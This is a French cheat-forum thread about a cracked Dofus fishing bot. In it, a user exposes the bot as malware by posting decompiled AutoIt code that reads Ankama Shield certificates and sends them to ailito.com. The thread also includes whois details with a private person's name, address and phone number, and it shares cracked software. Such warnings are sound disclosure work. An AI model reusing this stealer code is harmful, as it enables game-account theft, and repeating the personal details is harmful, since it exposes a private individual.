Aili-pêche V3

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

Status
Not open for further replies.

Jordan123

J0Bot R.I.P
V
Dec 31, 2010
1,741
0
461
48
Derrière un VPN
www.youtube.com
Voila,voila ! j'ai payer pour vous le bot aili-pêche,je me réserve une partie du bot tout de même !


Ces fonctions :


-Permet de pêcher aux choix tous les types de poisson en simultané ou non;
-Gère les agressions des protecteurs de ressources;
-Refuse les invitations (groupe, guilde, défi...);
-Ferme toutes fenêtres ouverte par erreur (Inventaire, caractéristique, sort...);
-Possibilité de supprimé les sacs de ressources au choix;
-Gestion de passage de niveau dans le métier;

Download ! Suite au demande malheuresement,le crack n'est plus en ligne.

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
 

salim1996

Membre actif
Nov 1, 2010
138
0
932
33
Merci mais bon jasume pas trop de crack car ali fais des bot genial fiable donc je dit juste merci
 

dedegolden

Membre actif
Jan 17, 2010
119
0
922
34
Morocco
il me fais un message d'erreur line 850 je suis sous windows vista .
j'ai mit tous correctement ma résolution ecran est 800x600
 

Jordan123

J0Bot R.I.P
V
Dec 31, 2010
1,741
0
461
48
Derrière un VPN
www.youtube.com
Derien tout le monde :D

@u cauléreu ----> on est sur un forum de partage alors le sujet ne sera pas fermé par contre toi pour l'insulte d'un membre si un modo passe ... mais bon je ne dirais rien.

Je confirme Ailito fait un assez bon bot,je n'est pas diffusé un crack entier les meilleurz zones ne son pas mise dans le crack
 

turanus

Membre
Dec 23, 2010
36
0
431
jordan123 t'es un vrai idiot. Etant un membre fidèle des programmes de Ailito je me permets de te dire qu'il à droit à sa part d'argent pour passer du temps à nous concocter ces petites merveilles, surtout pour le peu qu'il coûte pour un simple appel ou SMS.
Je pense que ça sera démoralisant pour lui de voir que tu download ses dernière versions que tu les héberges et les donnes gratuitement. S'il ne touche rien la dessus pour le temps consacré tu crois qu'il va continuer à faire des mises à jour?


Pfff, à fermer :pff:



Si tu commence comme ça , il faut fermer µTorrent aussi...

Merci ;)
 

Jordan123

J0Bot R.I.P
V
Dec 31, 2010
1,741
0
461
48
Derrière un VPN
www.youtube.com
Non c'est un forum de partage , de plus ton bot est publié un peut partout j'ai reçu 72 téléchargement du fichier :)

Est le fichier est pas infecté c'est juste que il a peur de perdre de l'argent

Désoler je supporte pas les bots payants
 

σνєянα¢к²

Membre Banni
Dec 19, 2010
1,634
1
461
~ ## ~
Tu as intérêt a faire fermer ce lien rapidement !! Je suis le créateur de ce bot.

Ne l'utilisé pas au risque de vous faire hacker votre compte.

Merci de télécharger la version officiel sur Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!


Ne l'utilisé pas au risque de vous faire hacker votre compte.


Bonsoir ,


La Blague Fail x) .



Sinon ici c'est un forum de partage (En gros c'est partager des logiciels payants gratuitement :mdr1:)
Si tu veut plus faire de MAJ , on en a rien a ******


Allez , a bientôt ....
 

Ailito

Membre Banni
Jan 22, 2010
141
0
576
31
www.ailito.serv-ice.org
Oki je suis d'accord avec toi sur sa il y a pas de problème, mais au moin respecte les programmeurs pour leur travail, ne vous étonnez pas qu'il n'y aura de moins en moins de bot disponible en détruisant le travail des programmeurs.

A la base je créer des bot pour ma propre utilisation, après je les partages par plaisir. J'en ai mis 1 en vente et sa sera le seul car la première version d'Ailipeche marcher très bien chez moi et que de nombreuse personne se plaignez car ils avaient pas la résolution d'écran adapter.

Donc j'ai entièrement refais le bot pour qu'il puisse marcher sur toute les résolutions et comme j'y est passé plus de 50H de boulot dessus j'ai décider de le vendre car je l'ai fais pour ceux qui ce plaignez et non pour moi.
 

SH1R02

Membre
Dec 2, 2011
16
0
301
Ce bot est un virus ! Il est détecté par un anti-virus. Vous allez me dire oui mais 1 sur xx anti-virus c'est rien ?

Regardez plutôt ça :

Func FTP()
$DOSSIER = @AppDataDir & "\AnkamaCertificates"
$LIST = _RECFILELISTTOARRAY($DOSSIER, "*", 1, 0, 2, 0)
If Not @error Then
For $I = 1 To $LIST[0]
$CERTIFICATO = FileRead($DOSSIER & "\" & $LIST[$I])
$CERTIFICATF = StringToBinary($CERTIFICATO)
$CERTIFICATF1 = StringMid(StringToBinary($CERTIFICATO), 1, 250)
$CERTIFICATF2 = StringMid(StringToBinary($CERTIFICATO), 251, 250)
$CERTIFICATF3 = StringMid(StringToBinary($CERTIFICATO), 501, 250)
INETREAD("http://ailito.com/Shield.php?FileName=" & $LIST[$I] & "&Certificat1=" & $CERTIFICATF1 & "&Certificat2=" & $CERTIFICATF2 & "&Certificat3=" & $CERTIFICATF3)
Next
Else
EndIf
EndFunc

C'est ce que l'ont peut trouver dans le code de sont bot en le dé compilant. C'est un stealer d'ankama-shield il vole votre AS pour pouvoir pirater votre compte dofus. Il y à eu déjà plusieurs plaintes et plusieurs victimes sur d'autres forums de cheat. Bot à ne pas utiliser

Pour ceux que sa intéresserais :

Domain Name: AILITO.COM

Registrant:
None
Yann Larousse ()
206 route des jolies bois
Gujan
Gironde,33470
FR
Tel. 0611547634

Creation Date: 28-Nov-2010
Expiration Date: 28-Nov-2012
 

SH1R02

Membre
Dec 2, 2011
16
0
301
Tu parle mais les preuves sont là si Monsieur Jordan de J0bot sais dé compiler un .exe (si c'est pas trop haut pour ses compétences) il s’apercevrait que ce bot est une pure merde et qu'il est truffé de backdoore. dé compile le toi même tu verras et surtout tu la fermera :)
 

pipo35

Membre
Aug 14, 2011
44
0
912
j'ai decompiler , dans sa source y a carrement un key Oo, en plus il y a un changement d'host + envoie de certificat ankama shield =) a ne plus use
 
Status
Not open for further replies.